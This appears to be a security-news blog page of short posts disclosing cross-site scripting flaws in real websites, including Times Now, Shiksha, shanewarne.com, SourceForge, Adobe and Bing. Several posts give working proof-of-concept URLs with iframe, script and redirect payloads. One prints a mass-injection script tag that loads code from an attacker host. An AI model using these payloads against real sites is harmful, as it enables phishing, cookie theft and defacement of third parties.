Search This Blog

Showing posts with label XSS Injection. Show all posts

Time Now Tv & Shiksha Official Websites Vulnerable To XSS Security Flaw

An 21 Years Old Information Security Expert, Narendra Bhati(R00t Sh3ll The Untracable) From Sheoganj Rajasthan ,Who Recently Acknowledge By Acquia.com and also find Many Persistent XSS And One SQL Injection In A Bank Website has discovered a non-persistent XSS security flaw in the official website of Shiksha.com,Times Of India, News Bullet Sub Domain Of Start News Channel.

Narendra Says- Kailash Bhayya ,Ravi Sir & Sabari Sir This Is For You :-)

Shiksha.com is part of the naukri.com group-Indias No.1 job portal. Other portals owned by our parent company Info Edge are 99acres.com, JeevanSathi.com, Brijj.com and AskNaukri.com.


TIMES NOW(timesnow.tv) is a Leading 24-hour English News channel that provides the Urbane viewers the complete picture of the news that is relevant, presented in a vivid and insightful manner, which enables them to widen their horizons & stay ahead.

In all these websites search fields are found to be vulnerable to the XSS injection.

POC code for Times Of India Tv:
http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakthesecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0




POC FOR Shiksha.com :
http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurity.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=-1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duration=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_search&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggestor_suggestion_shown=5
 Narendra also found that shiksha.com is also vulnerable to CSRF that allow attacker to change mobile no. of victim by a malicious web page .

Narendra also claimed that he try a lot to contact these all website by email,facebook page etc. But they not replied him from 1 month. After this he decided to disclose this vulnerability and reported to EHN. 

Shane Warne Official Website Vulnerable to XSS Security flaw


An 21 Years Old Information Security Expert, Narendra Bhati From Sheogan Rajasthan ,Who recently find Non Persistent XSS In Brother Soft Aircel & MTS Mobile And SQL Injection In A Bank Website has discovered a non-persistent XSS security flaw in the official website of Shane Warne

Narendra Want To Say That “Maa, Papa And Bhayya One Day I Will Make You Proud On Me”

Narendra found that the Search Query field in the Webpage of the www.shanewarne.com is vulnerable to  XSS attack.

Shane’s  world class talents have been recognized through a number of distinguished awards, including being named one of only five Wisden’s Cricketers of the 20th Century, in Australia’s Cricket Team of the 20th Century, BBC Sports Personality of the Year in 2005, and Victoria’s Greatest Ever Sportsman in 2002.  In 2011 Shane was honored with the unveiling of a bronze statue of him at the Melbourne Cricket Ground, and in early 2012 was inducted into the Australian Cricket Hall of Fame.         
                                   
When an attacker visits "www.shanewarne.com " and enter the xss code in the field , it successfully executes the entered script.

POC code :

http://www.shanewarne.com/search/content?q=<script>alert("E+Hacking+News")</script>

The site also allows users to inject the iframe code:
http://www.shanewarne.com/search/content?q="/><iframe+src="http://www.ehackingnews.com"+width=1000+height=1000></iframe>


Narendra also successfully in redirection that sharn warne website to another website.  After 5 seconds of loading of website the page going to redirect to inouted website. So its easy for the attacker to redirect to a phishing website or another website to make target to innocent user and steal them credentials.. ;-)

POC Code

http://www.shanewarne.com/search/content?q=<meta+http-equiv="refresh"+content="2;url=http://www.google.com/">

SourceForge vulnerable to XSS injection

A security researcher WilyXem from spain has discovered Reflected cross site scripting vulnerability in SourceForge(sourceforge.net).

SourceForge is a web-based source code repository. It acts as a centralized location for software developers to control and manage free and open source software development.

The vulnerability exists in the job finding page of sourceforge. The developer fails to validate input coming frin the text box that allows user to search jobs.

This left the text field vulnerable to attack.



The poc code:
sourceforge.net/jobs?age=1&text=1%22%3E%3Cscript%3Ealert%28%22WilyXem%20==%20UnderC0de.org%22%29%3C/script%3E&zip=10003&submit=Search

Over One million Pages infected by lilupophilupop.com SQL injection :XSS Injection


Last year(Yes it is last year) on Dec 1st , ISC reported about the lilupophilupop.com SQL injection attack (combined with XSS technique). When they report for first time, the number of infected pages is 80. later in the middle of the month, it raise to 160,000 . At the end of the month(Now), The infected page list crossed one million.

These sites are infected by injecting the following script :
"></title><script src="http://lilupophilupop.com/sl.php"></script>

According to their report, the infected domain are from:

  • NL - 123,000
  • FR - 68,100
  • UK - 56,300
  • DE - 49,700
  • RU - 32,000
  • DK - 31,000
  • COM - 30,500
  • JP - 23,200
  • CA - 16,600
  • ORG - 2,690
  • CN - 505

After researching the log records of the infected sites, the attackers try to attack the vulnerable sites daily from different IP address.

"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept. " Said in the First report.


Check Your Sites Infected by these Attack:
If you want to make sure, your site is infected by the attack, then search in google as:
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com

replace the "your_site.com" with your site url.

XSS Vulnerability in US Department of Health Human Services website

An INTRA team member ,Jackeh discovered Non-Persistant XSS (Cross-Site Scripting) vulnerability in the Disaster Information Management Research Center.

Vulnerability Details:
Type: XSS(Non-Persistent)
Targer Url: phpreparedness.nlm.nih.gov
vulnerable Link: here

Skype for iPhone and iPod vulnerable to XSS ~Attacker able to steal data




A security Researcher,Phil discovered the XSS(Cross site Scripting) vulnerability in Skype v3.0.1 and earlier versions for iPhone and iPod touch Devices.

Skype uses a locally stored HTML file to display chat messages from other Skype users, but it fails to properly encode the incoming users "Full Name", allowing an attacker to craft malicious JavaScript code that runs when the victim views the message.


Executing arbitrary Javascript code is one thing, but he found that Skype also improperly defines the URI scheme used by the built-in webkit browser for Skype. Usually you will see the scheme set to something like, "about:blank" or "skype-randomtoken", but in this case it is actually set to "file://". This gives an attacker access to the users file system, and an attacker can access any file that the application itself would be able to access.

File system access is partially mitigated by the iOS Application sandbox that Apple has implemented, preventing an attacker from accessing certain sensitive files. However, every iOS application has access to the users AddressBook, and Skype is no exception. he created a proof of concept injection and attack that shows that a users AddressBook can indeed be stolen from an iPhone or iPod touch with this vulnerability.

Video Demo:

Kaskus - The Largest Indonesian Community Hacked using XSS vulnerability

Kaskus.us - The Largest Indonesian Community is vulnerable to XSS ,discovered by Cyber4rt .

Vulnerability Information:
Type: XSS
Vulnerability Link: here
Status:Unfixed
Persistent Type: Non-Persistent

 Few days back, Cyber4rt discovered the XSS vulnerability in Games.com

Adobe Groups Profile Hacked using XSS(cross site Scripting)~Unfixed

Still Adobe didn't fix the XSS vulnerability in adobe groups profile. One more adobe group profile is created with xss Injection by Hacker Sony.

Check this:
http://bikaner.groups.adobe.com/index.cfm?event=post.display&postid=38442

One more Link:
http://bikaner.groups.adobe.com/index.cfm?event=post.display&postid=38443

source

Adobe Labs vulnerable to XSS(Cross site Scripting) ,found by @codeinesec



Hacker named as codeine(INTRA Team member) discovered the XSS(Cross Site Scripting) vulnerability in Adobe Labs.  This XSS vulnerability may result in Cookie stealing.  So Adobe must fix this.

 Vulnerability:
 http://labs.adobe.com/technologies/spry/samples/rating/SpryRating.php?spry_dynamic=<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>

Yesterday  hacker named as sony discovered the Xss vulnerability(persistent) Adobe Profile.

Adobe Groups Profile Hacked using XSS(cross site Scripting) by Sony

A hacker known as Sony hacked Adobe Groups profile using the XSS(Cross Site Scripting) vulnerability. The XSS is persistent type, means "if you insert files, it will
be there permanently.  It will be shown to all users". So hackers are able to steal cookies using that.

Vulnerability Information:
  • Vulnerability Type: XSS.
  • Persistent: Yes .
  • STATUS: Unfixed.
  • Hacked By: Hacker named as "Sony".
  • Defacement: Defaced the Profile Page, not main page.
Proof of Vulnerability:


GAMES.COM is vulnerable to XSS ( Cross Site Scripting) ,discovered by Cyber4rt




A famous Gaming website "www.games.com" is vulnerable to XSS(cross site Scripting), discovered by Cyber4rt.  The Searching is vulnerable to XSS.





Vulnerability  Information:
  •  Vulnerability: XSS
  •  Discovered By: Cyber4rt
  •  Website: www.games.com
  • Status: UnFixed.

Proof of vulnerability:


Juan Sacco (runlvl) exposed XSS vulnerability in Bing.com Maps

Juan Sacco (runlvl),One of the Security Researcher - Insecurity Research Labs exposed the XSS vulnerability in Bing.com Search Engine.

BING.COM is prone to a XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.

Details
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is exectued by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read

Vulnerabilit Details:
  • Name : XSS Reflected on BING.COM
  • Vulnerability Type : XSS Reflected
  • Severity : Very High
  • Researcher : Juan Sacco (runlvl) 
  • Vulnerable Link: here

The vulnerability is caused by the following code and affected by the
Generate Code map

<div id="LME_mapLinks" style="line-height: 20px">
<a id="LME_largerMap" //--&gt;&quot;&gt;'&gt; on Bing Maps (New
window)">View Larger Map</a>
</div>




Credits
Manual discovered by Insecurity Research Labs
Juan Sacco (runlvl) - http://www.insecurityresearch.com

XSS Injection Vulnerability found in Forbes.com

One of the Leading News Company Forbes is Vulnerable. Hacker with name "B1uB3rry" expose that Forbes.com is vulnerable to possible SQL injection but confirmed to be vulnerable to Cross Site Script Injection (XSS) & HTML Injection. According to hacker "One can easily deface the website as other vulnerabilities exist." Live Example of XSS injection on Forbes . Hacker is Admin of B1uB3rry Security Team (San Antonio, TX).

Vulnerable Link